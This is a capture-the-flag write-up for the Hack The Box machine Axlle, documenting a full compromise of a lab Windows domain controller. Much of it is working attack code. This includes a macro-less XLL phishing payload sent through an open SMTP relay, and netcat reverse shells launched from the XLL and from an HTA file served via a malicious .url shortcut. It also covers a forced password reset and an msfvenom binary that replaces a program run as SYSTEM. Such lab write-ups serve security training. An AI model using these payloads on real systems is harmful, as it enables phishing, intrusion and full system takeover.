Owned Axlle from Hack The Box!
I have just owned machine Axlle from Hack The Box
Nmap Results
# Nmap 7.94SVN scan initiated Mon Jun 24 13:41:37 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.90.84
Nmap scan report for 10.129.90.84
Host is up (0.017s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Axlle Development
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-24 17:42:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: AXLLE
| NetBIOS_Domain_Name: AXLLE
| NetBIOS_Computer_Name: MAINFRAME
| DNS_Domain_Name: axlle.htb
| DNS_Computer_Name: MAINFRAME.axlle.htb
| DNS_Tree_Name: axlle.htb
| Product_Version: 10.0.20348
|_ System_Time: 2024-06-24T17:45:11+00:00
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Not valid before: 2024-05-19T11:25:03
|_Not valid after: 2024-11-18T11:25:03
|_ssl-date: 2024-06-24T17:45:51+00:00; +12s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
54306/tcp open msrpc Microsoft Windows RPC
63807/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
63808/tcp open msrpc Microsoft Windows RPC
64655/tcp open msrpc Microsoft Windows RPC
64669/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-24T17:45:13
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 11s, deviation: 0s, median: 11s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 24 13:45:40 2024 -- 1 IP address (1 host up) scanned in 242.62 seconds💡
Don't miss an opportunity to gather some valuable breadcrumbs from the
nmap output- On
tcp/389we see a domain ofaxlle.htb - On
tcp/3389we seecommonName=MAINFRAME.axlle.htb
Let's go ahead and get those added to our /etc/hosts file:
echo -e '10.129.90.84\taxlle.htb mainframe.axlle.htb' | sudo tee -a /etc/hostsService Enumeration
TCP/53
host -l axlle.htb 10.129.90.84
TCP/445
smbclient -N -L //mainframe.axlle.htb
NULL Session Enumerati... | 0xBEN | Notes
NULL Session
LDAP, SMB, and RPC may allow a user to authenticate to the service without providing a…
nxc or enum4linuxTCP/88
Kerberos Pre-Auth User... | 0xBEN | Notes
How it Works
We can send a request for a TGT --- without a pre-authentication hash --- to the Kerbe…
cat /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt | tr '[:upper:]' '[:lower:]' | sort -u > kerberos_users.txtkerbrute userenum -d axlle.htb --dc 10.129.90.84 -t 100 -o kerbrute.log ./kerberos_users.txt
AS-REP Roasting (Inter... | 0xBEN | Notes
AS-REP Roasting
If Kerberos pre-authentication is disabled on a user account in Active Directory, t…
grep '@' kerbrute.log | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > domain_users.txt
TCP/80
Penetration Testing
ℹ️
Normally, I'd insert a section about walking the application before proceeding to the penetration test, but since there really aren't any clickable elements or input points, we're going to move along.
There don't appear to be any robots.txt or sitemap.xml files that would reveal additional directories or files on the web server; nothing interesting in the site source code. So, we'll need to do some brute forcing via a tool such as gobuster.
tcp/25 is open on the box, so email an Excel format document to the target account and possibly get some kind of interactionGobuster Enumeration
Virtual Hosts
⚠️
http://axlle.htb and http://mainframe.axlle.htb load the same content, so virtual hosts do not seem to be configured on this servergobuster vhost -k --domain axlle.htb --append-domain -u http://10.129.90.84 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100No additional virtual hosts found using this word list.
Directories and Files
gobuster dir -u http://axlle.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -o axlle.htb.txt -t 100/assets [36m (Status: 301)[0m [Size: 147][34m [--> http://axlle.htb/assets/][0m
/css [36m (Status: 301)[0m [Size: 144][34m [--> http://axlle.htb/css/][0m
/js [36m (Status: 301)[0m [Size: 143][34m [--> http://axlle.htb/js/][0mNothing particularly interesting
TCP/25
ℹ️
At this point, I'm nearly certain that the path to exploitation is via the open relay. The open relay will allow us to send email to any internal user without the need for a credential.
We know we need to send a Excel formatted document to the target and it mustn't have a macro as the payload.
We know we need to send a Excel formatted document to the target and it mustn't have a macro as the payload.
25,465,587 - Pentesting SMTP/s | HackTricks
HackTricks shows we can use sendEmail or swaks as CLI tools to send the email
Office - Attacks - Internal All The Things
Active Directory and Internal Pentest Cheatsheets
I looked at some Excel payloads on a few different knowledge bases, but this one was the only one I could find with an Excel payload that didn't have a macro -- a XLL file
GitHub - Octoberfest7/XLL_Phishing: XLL Phishing Tradecraft
XLL Phishing Tradecraft. Contribute to Octoberfest7/XLL_Phishing development by creating an account on GitHub.
Octoberfest7Referencing this page, we see that .xll files are more or less .dll files for Excel, we also see an example of how to cross-compile on Linux
Testing the Exploit
💡
Using the compile example in the GitHub link above, I just removed any flags and references to the Excel SDK files to see what would happen and it seems to compile just fine
#include <windows.h> -- lowercase -- as the payload example above has it uppercase, which throws a compile error#include <windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
void __cdecl xlAutoOpen() {
// Triggers when Excel opens
WinExec("cmd.exe /c ping 10.10.14.191", 1);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}pwn.c -- Ping test to my VPN IP
x86_64-w64-mingw32-gcc pwn.c -o pwn.xll -s -Os -DUNICODE -sharedAgain, just removed flags and references to Excel SDK files to test compile
sudo tcpdump -ni tun0 icmpStart TCP dump and listen for ICMP traffic
swaks --to 'accounts@axlle.htb' --from 'pwn@pwn.htb' \
--header 'Subject: Pwn' --body 'Pwn' --server axlle.htb --attach @pwn.xllSend the email to the target account via the open relay, be sure to attach the file with the @ sign included
Exploit
Reverse Shell
cp /usr/share/windows-binaries/nc.exe .Copy the nc.exe binary to the current directory for hosting via SMB
sudo impacket-smbserver -smb2support -username evil -password evil myshare .Start an ad-hoc SMB server to host nc.exe, with a share named myshare and authenticated with credentials evil:evil
#include <windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
void __cdecl xlAutoOpen() {
// Triggers when Excel opens
WinExec("powershell -nop -noni -ep bypass -w hidden -command \"New-SmbMapping -LocalPath H: -RemotePath \\\\10.10.14.191\\myshare -UserName evil -password evil; H:\\nc.exe 10.10.14.191 443 -e powershell.exe\"", 1);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}pwn.c -- Map Kali SMB share and run nc.exe to create reverse shell
x86_64-w64-mingw32-gcc pwn.c -o pwn.xll -s -Os -DUNICODE -shared && ls -l pwn.xllRecompile the .xll file
sudo rlwrap nc -lnvp 443Start the TCP listener on the target port
swaks --to 'accounts@axlle.htb' --from 'pwn@pwn.htb' \
--header 'Subject: Pwn' --body 'Pwn' --server axlle.htb --attach @pwn.xllSend the email via the open relay to the target account, again attach the file with the @ sign
Post-Exploit Enumeration
Operating Environment
OS & Kernel
WindowsBuildLabEx : 20348.1.amd64fre.fe_release.210507-1500
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 1/1/1970 12:00:00 AM
WindowsProductId :
WindowsProductName : Windows Server 2022 Standard
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 2009
OSDisplayVersion : 21H2
BiosCharacteristics : {4, 7, 9, 11...}
BiosBIOSVersion : {INTEL - 6040000, VMW71.00V.21805430.B64.2305221826,
VMware, Inc. - 10000}
BiosBuildNumber :
BiosCaption : VMW71.00V.21805430.B64.2305221826
BiosCodeSet :
BiosCurrentLanguage :
BiosDescription : VMW71.00V.21805430.B64.2305221826
BiosEmbeddedControllerMajorVersion : 255
BiosEmbeddedControllerMinorVersion : 255
BiosFirmwareType : Uefi
BiosIdentificationCode :
BiosInstallableLanguages :
BiosInstallDate :
BiosLanguageEdition :
BiosListOfLanguages :
BiosManufacturer : VMware, Inc.
BiosName : VMW71.00V.21805430.B64.2305221826
BiosOtherTargetOS :
BiosPrimaryBIOS : True
BiosReleaseDate : 5/21/2023 5:00:00 PM
BiosSeralNumber : VMware-42 30 8b ab bc ed 60 7e-e4 b8 66 42 2d 84 a8 14
BiosSMBIOSBIOSVersion : VMW71.00V.21805430.B64.2305221826
BiosSMBIOSMajorVersion : 2
BiosSMBIOSMinorVersion : 7
BiosSMBIOSPresent : True
BiosSoftwareElementState : Running
BiosStatus : OK
BiosSystemBiosMajorVersion : 255
BiosSystemBiosMinorVersion : 255
BiosTargetOperatingSystem : 0
BiosVersion : INTEL - 6040000
CsAdminPasswordStatus : Enabled
CsAutomaticManagedPagefile : True
CsAutomaticResetBootOption : True
CsAutomaticResetCapability : True
CsBootOptionOnLimit : DoNotReboot
CsBootOptionOnWatchDog : DoNotReboot
CsBootROMSupported : True
CsBootStatus : {0, 0, 0, 33...}
CsBootupState : Normal boot
CsCaption : MAINFRAME
CsChassisBootupState : Safe
CsChassisSKUNumber :
CsCurrentTimeZone : -420
CsDaylightInEffect : True
CsDescription : AT/AT COMPATIBLE
CsDNSHostName : MAINFRAME
CsDomain : axlle.htb
CsDomainRole : PrimaryDomainController
CsEnableDaylightSavingsTime : True
CsFrontPanelResetStatus : Unknown
CsHypervisorPresent : True
CsInfraredSupported : False
CsInitialLoadInfo :
CsInstallDate :
CsKeyboardPasswordStatus : Unknown
CsLastLoadInfo :
CsManufacturer : VMware, Inc.
CsModel : VMware7,1
CsName : MAINFRAME
CsNetworkAdapters : {Ethernet0 2}
CsNetworkServerModeEnabled : True
CsNumberOfLogicalProcessors : 2
CsNumberOfProcessors : 2
CsProcessors : {AMD EPYC 7763 64-Core Processor , AMD EPYC
7763 64-Core Processor }
CsOEMStringArray : {[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7],
Welcome to the Virtual Machine}
CsPartOfDomain : True
CsPauseAfterReset : 3932100000
CsPCSystemType : Desktop
CsPCSystemTypeEx : Desktop
CsPowerManagementCapabilities :
CsPowerManagementSupported :
CsPowerOnPasswordStatus : Disabled
CsPowerState : Unknown
CsPowerSupplyState : Safe
CsPrimaryOwnerContact :
CsPrimaryOwnerName : Windows User
CsResetCapability : Other
CsResetCount : -1
CsResetLimit : -1
CsRoles : {LM_Workstation, LM_Server, Primary_Domain_Controller,
Timesource...}
CsStatus : OK
CsSupportContactDescription :
CsSystemFamily :
CsSystemSKUNumber :
CsSystemType : x64-based PC
CsThermalState : Safe
CsTotalPhysicalMemory : 4293926912
CsPhyicallyInstalledMemory : 4194304
CsUserName : AXLLE\Administrator
CsWakeUpType : PowerSwitch
CsWorkgroup :
OsName : Microsoft Windows Server 2022 Standard
OsType : WINNT
OsOperatingSystemSKU : StandardServerEdition
OsVersion : 10.0.20348
OsCSDVersion :
OsBuildNumber : 20348
OsHotFixes : {}
OsBootDevice : \Device\HarddiskVolume2
OsSystemDevice : \Device\HarddiskVolume3
OsSystemDirectory : C:\Windows\system32
OsSystemDrive : C:
OsWindowsDirectory : C:\Windows
OsCountryCode : 1
OsCurrentTimeZone : -420
OsLocaleID : 0409
OsLocale : en-US
OsLocalDateTime : 6/26/2024 3:32:09 PM
OsLastBootUpTime : 6/26/2024 7:06:50 AM
OsUptime : 08:25:18.5331881
OsBuildType : Multiprocessor Free
OsCodeSet : 1252
OsDataExecutionPreventionAvailable : True
OsDataExecutionPrevention32BitApplications : True
OsDataExecutionPreventionDrivers : True
OsDataExecutionPreventionSupportPolicy : OptOut
OsDebug : False
OsDistributed : False
OsEncryptionLevel : 256
OsForegroundApplicationBoost : Maximum
OsTotalVisibleMemorySize : 4193288
OsFreePhysicalMemory : 2658156
OsTotalVirtualMemorySize : 4914184
OsFreeVirtualMemory : 2919432
OsInUseVirtualMemory : 1994752
OsTotalSwapSpaceSize :
OsSizeStoredInPagingFiles : 720896
OsFreeSpaceInPagingFiles : 334044
OsPagingFiles : {C:\pagefile.sys}
OsHardwareAbstractionLayer : 10.0.20348.2031
OsInstallDate : 1/22/2023 1:35:28 AM
OsManufacturer : Microsoft Corporation
OsMaxNumberOfProcesses : 4294967295
OsMaxProcessMemorySize : 137438953344
OsMuiLanguages : {en-US}
OsNumberOfLicensedUsers :
OsNumberOfProcesses : 123
OsNumberOfUsers : 11
OsOrganization :
OsArchitecture : 64-bit
OsLanguage : en-US
OsProductSuites : {TerminalServices, TerminalServicesSingleSession}
OsOtherTypeDescription :
OsPAEEnabled :
OsPortableOperatingSystem : False
OsPrimary : True
OsProductType : DomainController
OsRegisteredUser : Windows User
OsSerialNumber : 00454-20165-01481-AA576
OsServicePackMajorVersion : 0
OsServicePackMinorVersion : 0
OsStatus : OK
OsSuites : {TerminalServices, TerminalServicesSingleSession}
OsServerLevel :
KeyboardLayout : en-US
TimeZone : (UTC-08:00) Pacific Time (US & Canada)
LogonServer :
PowerPlatformRole : Desktop
HyperVisorPresent : True
HyperVRequirementDataExecutionPreventionAvailable :
HyperVRequirementSecondLevelAddressTranslation :
HyperVRequirementVirtualizationFirmwareEnabled :
HyperVRequirementVMMonitorModeExtensions :
DeviceGuardSmartStatus : Off
DeviceGuardRequiredSecurityProperties :
DeviceGuardAvailableSecurityProperties :
DeviceGuardSecurityServicesConfigured :
DeviceGuardSecurityServicesRunning :
DeviceGuardCodeIntegrityPolicyEnforcementStatus :
DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus :
Current User
User Name SID
=================== =============================================
axlle\gideon.hamill S-1-5-21-1005535646-190407494-3473065389-1113
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
AXLLE\Accounts Group S-1-5-21-1005535646-190407494-3473065389-1104 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
gideon.hamill
Domain Users
samAccountName MemberOf
-------------- --------
Administrator {CN=Group Policy Creator Owners,CN=Users,DC=axlle,DC=htb, CN=Domain Admins,CN=Users,DC=axlle,DC=htb...
Guest {}
krbtgt {CN=Denied RODC Password Replication Group,CN=Users,DC=axlle,DC=htb}
david.brice {}
frankie.rose {}
brad.shaw {}
samantha.jade {}
gideon.hamill {CN=Accounts,CN=Users,DC=axlle,DC=htb}
xavier.edmund {}
emily.cook {}
brooke.graham {}
trent.langdon {}
matt.drew {}
jess.adams {}
jacob.greeny {}
simon.smalls {}
dan.kendo {}
lindsay.richards {}
calum.scott {}
dallon.matrix {}
baz.humphries {}
Domain Groups
Remote Management Users
-----------------------
CN=Baz Humphries,DC=axlle,DC=htb
CN=Jacob Greeny,DC=axlle,DC=htb
Employees
---------
CN=Web Devs,CN=Users,DC=axlle,DC=htb
CN=App Devs,CN=Users,DC=axlle,DC=htb
CN=Sales,CN=Users,DC=axlle,DC=htb
CN=HR,CN=Users,DC=axlle,DC=htb
CN=Accounts,CN=Users,DC=axlle,DC=htb
Accounts
--------
CN=Lindsay Richards,DC=axlle,DC=htb
CN=Simon Smalls,DC=axlle,DC=htb
CN=Gideon Hamill,DC=axlle,DC=htb
CN=Brad Shaw,DC=axlle,DC=htb
HR
--
CN=Jess Adams,DC=axlle,DC=htb
CN=Samantha Jade,DC=axlle,DC=htb
CN=Frankie Rose,DC=axlle,DC=htb
CN=David Brice,DC=axlle,DC=htb
Sales
-----
CN=Matt Drew,DC=axlle,DC=htb
CN=Brooke Graham,DC=axlle,DC=htb
CN=Emily Cook,DC=axlle,DC=htb
CN=Xavier Edmund,DC=axlle,DC=htb
App Devs
--------
CN=Baz Humphries,DC=axlle,DC=htb
CN=Jacob Greeny,DC=axlle,DC=htb
Web Devs
--------
CN=Dallon Matrix,DC=axlle,DC=htb
CN=Calum Scott,DC=axlle,DC=htb
CN=Dan Kendo,DC=axlle,DC=htb
CN=Trent Langdon,DC=axlle,DC=htb
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1f6
IPv6 Address. . . . . . . . . . . : dead:beef::f77f:54f1:1937:993d
Link-local IPv6 Address . . . . . : fe80::6830:724b:c4a5:f46d%11
IPv4 Address. . . . . . . . . . . : 10.129.111.107
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%11
10.129.0.1
Open Ports
0.0.0.0 110
0.0.0.0 143
0.0.0.0 587
0.0.0.0 636
0.0.0.0 3269
0.0.0.0 3268
Processes and Services
Interesting Processes
456 40 16552 21872 2684 0 hMailServer
Interesting Services
Name : hMailServer
StartName : LocalSystem
PathName : "C:\Program Files (x86)\hMailServer\Bin\hMailServer.exe" RunAsService
Interesting Files
C:\Program Files (x86)\hMailServer\data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
# How I discovered the file
cd "C:\Program Files (x86)"
gci -file -r -ea silentlycontinue | select fullname
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
by MAINFRAME with ESMTP
; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
Privilege Escalation
Read Access on Stored Email
During the post-exploit enumeration phase, I followed my typical procedure and found the hMailServer application running as a service on the target. So, I navigated to the install directory and recursively searched for files there and noted the read access on C:\Program Files (x86)\hMailServer\data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml (see above).
The email contains an internal message asking the team to drop web shortcuts in C:\inetpub\testing to automate the checking and addition of URLs on the OSINT portal. So, it sounds like there will be a scheduled task of some sort to read any files dropped there.
We know this much:
- It needs to be a file in
C:\inetpub\testing - It needs to be a web shortcut pointing to a URL
Creating a Malicious URL Shortcut
.url file extension
Testing the Shortcut File on the Target
@'
[InternetShortcut]
IDList=
URL=http://10.10.14.191/pwn.txt
'@ > C:\inetpub\testing\test.urlCreate the URL shortcut file on the target and store it in the target path
💡
Being able to see the
In this case, the
User-Agent string here is very helpful here, as we can make a more informed determination on how we might exploit the client requesting any files from our web serverIn this case, the
Trident/7.0 user agent string is particularly interesting.Trident (software) - Wikipedia
Contributors to Wikimedia projects
More information about the Trident HTTP client
Shells - Windows | HackTricks
We should be able to serve a .hta file from our web server and have be executed by the Trident MSHTML client
HTML Application - Wikipedia
Contributors to Wikimedia projects
More information about .hta files
Reverse Shell via Shortcut
💢
I must have tried a dozen different ways to craft the
So, I decided to try another URL scheme to serve the file. Schemes I tried are:
❌
❌
✅
.hta file, but could not get the exploit to run when served over HTTP. I tried Python http.server and Nginx. The client did retrieve the file, but did not run the exploit. So, I decided to try another URL scheme to serve the file. Schemes I tried are:
❌
http://❌
ftp://✅
file://Identifying resources on the Web - HTTP | MDN
The target of an HTTP request is called a “resource”, whose nature isn’t defined further; it can be a document, a photo, or anything else. Each resource is identified by a Uniform Resource Identifier (URI) used throughout HTTP for identifying resources.
sudo impacket-smbserver -smb2support myshare .Start an open SMB server on Kali to host the files for the exploit
net use H: \\10.10.14.191\myshare /persistent:yes
cp H:\nc.exe C:\Windows\Tasks\nc.exeWe should be able to use the H: drive from before and copy nc.exe locally for reuse
icacls C:\Windows\Tasks\nc.exe /grant Everyone:FWe want to enable all users to run the exploit
nano file.hta<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c C:\\Windows\\Tasks\\nc.exe 10.10.14.191 443 -e powershell.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>file.hta
sudo rlwrap nc -lnvp 443Start the TCP listener to catch the reverse shell
@'
[InternetShortcut]
IDList=
URL=file://10.10.14.191/myshare/file.hta
'@ > C:\inetpub\testing\test.urlCreate the URL shortcut in the target directory using a PowerShell Here-String
Enter key a couple of times when pasting the Here-String into the reverse shellLateral to Dallon Matrix
ℹ️
From here, we repeat the post-exploit enumeration steps
Bloodhound Enumeration
After some lengthy enumeration, I couldn't find any privilege escalation paths local via the file system or any installed programs, so it was time to look at the domain level...
BloodHound | 0xBEN | Notes
1. Installation
sudo apt install -y neo4j bloodhound 2. Setup
sudo neo4j console & Navigat…
sudo neo4j console &Start the database
sudo bloodhound &Start bloodhound
wget https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exeDownload the latest SharpHound.exe collector
sudo python3 -m http.server 80Host SharpHound.exe via HTTP server, because for whatever reason, it wouldn't copy from my SMB server
iwr http://10.10.14.191/SharpHound.exe -o sh.exeDownload the collector to the target and save it
.\sh.exe -c allRun the collector and gather all data from the domain that we can
# Remap the share
net use H: \\10.10.14.191\mysahre
# Copy the bloodhound archive
cp 20240627153013_BloodHound.zip H:\Transfer the bloodhound archive to Kali
From here, we unzip the bloodhound.zip archive and drag and drop the .json files into the Bloodhound window to upload the data.
dallon.matrix is in the Web Devs group, which has ForceChangePassword on baz.humphries
baz.humphries can WinRM to the domain controller, as well as membership in the App Devs group, which I believe will open C:\App Development to usLateral to Baz Humphries
$pw = ConvertTo-SecureString -AsPlainText -Force 'P@$$word123'
Set-ADAccountPassword -Identity baz.humphries -Reset -NewPassword $pw
evil-winrm -i axlle.htb -u 'baz.humphries' -p 'P@$$word123'
💡
Again, we start the post-exploit enumeration steps
Interesting Files
C:\App Development\kbfiltr\README.md
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
SYSTEM here is writable by our user group, App Devs, so we should be able to get an elevated shell that wayBecoming Administrator
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.191 LPORT=443 -b '\x00' -e 'x64/xor_dynamic' -f exe -o standalonerunner.exeCreate the impostor binary on Kali
upload function in evil-winrm to transfer the binary to the targetsudo rlwrap nc -lnvp 443Start a TCP listener
cp .\standalonerunner.exe 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe'Overwrite the binary
Flags
User
99e317bb6cacfc804db4577eac32677d
Root
70d7c776cbe82448a7e6822b3d16445a
